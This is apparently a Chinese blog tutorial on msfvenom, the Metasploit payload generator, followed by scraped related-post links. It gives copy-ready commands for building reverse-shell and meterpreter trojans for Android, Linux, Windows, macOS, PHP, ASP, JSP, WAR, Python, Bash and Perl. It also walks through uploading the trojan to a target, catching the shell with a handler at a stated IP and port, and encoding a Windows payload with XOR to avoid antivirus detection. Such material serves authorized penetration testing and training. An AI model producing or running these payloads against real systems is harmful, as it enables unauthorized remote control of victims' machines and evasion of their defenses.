msfvenom

  • 命令
  • 常见shell
  • 实例
  • 参考

命令

  • -l:列出所有模块。类型有:payloads, encoders, nops, platforms, archs, encrypt, formats, al.(使用 -l payloads列出payload,- -list-options 列出载荷参数)

  • -p:指定要使用的有效负载。
  • -f:输出文件的格式 ,(-l formats列出所有文件格式)
  • -e:指定要使用的编码器,(-list encodes列出所有编码器)
    • –smallest: 使用所有可用的编码器生成尽可能小的有效负载
  • -a:指定架构平台(–l archs 列出所有架构)
  • –platform:指定操作系统平台(-l platforms 列出所有平台)
  • -o:保存至指定文件。
  • -b:要避免的字符,示例:’\x00\xff’
  • n: 在payload上添加指定长度的nop指令
  • -s:产生的payload的最大大小.
    • –encoder-space:编码payload的最大大小.
  • -i: 对payload进行编码的次数
  • -c:指定一个win32的shellcode文件
  • -x:指定要用作模板的自定义可执行文件。
  • -k:保留-x行为并将有效负载作为新线程注入
  • -v:指定用于某些输出格式的自定义变量名
  • -t:从STDIN读取有效负载时等待的秒数(默认值为30,0表示禁用)
  • msfvenom -l | grep windows | grep x64 | grep tcp:列出windows平台,下x64架构tcp payload

常见shell

安卓app:msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o ~/Desktop/test2.apk
Linux  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac  msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php  
ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python  msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh     
Perl  msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Addre0ss> LPORT=<Your Port to Connect On> -f raw > shell.pl   

实例

  • linux: 使用linux/x86/meterpreter/reverse_tcp,查看参数

    当前目录下生成shell.elf,将文件上传至靶机

    使用msf,exploit/multi/handler模块监听
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.186.128
set lport 4444


当目标运行木马文件,就拿到一个meterpreter shell。

  • windows:windows64位,经过10次异或编码。在windows10下无报毒。
 msfvenom -p  windows/x64/meterpreter/reverse_tcp LHOST=192.168.186.128  LPORT=8888 --platform windows -e x64/xor -i 10 -a x64 -f exe >shell.exe


同样在msf下使用exploit/multi/handle模块。

执行后,成功拿到meterpreter shell

参考

https://www.cnblogs.com/BOHB-yunying/p/11628896.html
https://blog.csdn.net/qq_36119192/article/details/83869141

msfvenom木马生成工具相关推荐

  1. 【木马生成工具】Msfvenom介绍及利用

    Msfvenom介绍及利用 简介 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayloa ...

  2. 14、TheFatRat木马生成工具-创建后门或payload

    kail攻击主机: Kali 192.168.11.106 靶机:windows server 2008 r2  192.168.11.134  x64 32位 一.TheFatRat介绍 TheFa ...

  3. Metasploit 实现木马生成、捆绑及免杀

    简介: 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接.木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木 ...

  4. msfvenom——木马免杀篇

    msfvenom--木马免杀篇 目录 msfvenom--木马免杀篇 c语言执行 生成shellcode.c c语言执行 检查 python语言执行 方法一:python加载C代码 方法2:py2ex ...

  5. 【内网安全】——msf木马生成教程

    作者名:白昼安全 主页面链接: 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: web安全,后渗透技术 每日emo: 钱真的是万能的 一.msfvenom基本使 ...

  6. Linux下三个密码生成工具

    http://code.csdn.net/news/2820879 想出一个难破解且容易记的密码对不是一件简单的事情.在我为电脑设定一个新密码,或者在线注册了一个新的账号,需要输入密码的时候,脑袋就一 ...

  7. Web 开发人员必备的随机 JSON 数据生成工具

    在 Web 开发中,经常会需要一些测试数据来测试接口或者功能时候正确.JSON Generator 就是这样一款生成随机 JSON 数据的在线工具,Web 开发人员必备,记得收藏和分享啊. 您可能感兴 ...

  8. 开源!开源!我写的Anto.exe C#代码自动生成工具.欢迎下载。。

    在开发的过程中开发人员不得不经常要写很多重复的代码, 为了把精力放到更重要的方面去很多人为都做了N多努力,随便google一下自动生成工具, 你都会很容易得到很多这样的工具.园子就有好几款,其中李天平 ...

  9. Java短连接生成工具-思路

    Java短连接生成工具-思路-这里只是模拟一下 package com.csrs.trans.shorturl;import java.util.HashMap; import java.util.M ...

最新文章

  1. [百万级]通用存储过程.分页存储过程
  2. excel之根据单元格内容自动修改单元格颜色
  3. Centos上安装EPEL
  4. 没事试试50mm1.4
  5. 新疆大学ACM新生赛(公开赛)
  6. python输出命令_Python 输出命令行进度条
  7. PHP32向右位移2位是多少,PHP的二进制位移操作
  8. excel服务器2010网站,勤哲Excel服务器2010企业版(完整安装包)
  9. python 抢购小米_利用Python+selenium实现小米商城抢购代码
  10. html代码雨特效代码,html开发数字雨特效代码 - 贪吃蛇学院-专业IT技术平台
  11. linux 迅雷 命令行,Linux小迅雷:uGet下载工具加速 | 薄荷开源网
  12. Python实现网页自动截图
  13. eclipse里面运行tomcat显示无法显示页面
  14. VS2015中“项目无法加载,因为它缺少安装组件”的解决方法
  15. CentOS 6.5 安装使用iscsi-initiator
  16. 云主机和电脑主机服务器有什么区别?
  17. linux c 语言uint32 t,Linux中uint16_t
  18. 网页透明flash代码
  19. Window下编译 64位ffmpeg 引入libx264及libmp3lame编码库
  20. Java面向对象(类的无参和带参)

热门文章

  1. 2020年度博客之星排行榜,频繁更新中。。。
  2. 新一代云原生数据库的设计与实践
  3. IBM林咏华:AI王牌炼成记——访IBM全球杰出工程师、人工智能系统技术总监、IBM中国研究院林咏华
  4. FD快餐店迭代三设计文档
  5. 最简单的无线电中继——录音中继
  6. 麻将游戏算法深入解析
  7. php拨号接口,拨号网络对应的协议是什么
  8. html如何批量查找数字,wps文档中的全部数字怎么快速查找
  9. 《进击的巨人第三季part2》爬取豆瓣网友评论,制作词云图
  10. Ansys APDL pro/e IGES仿真简单流程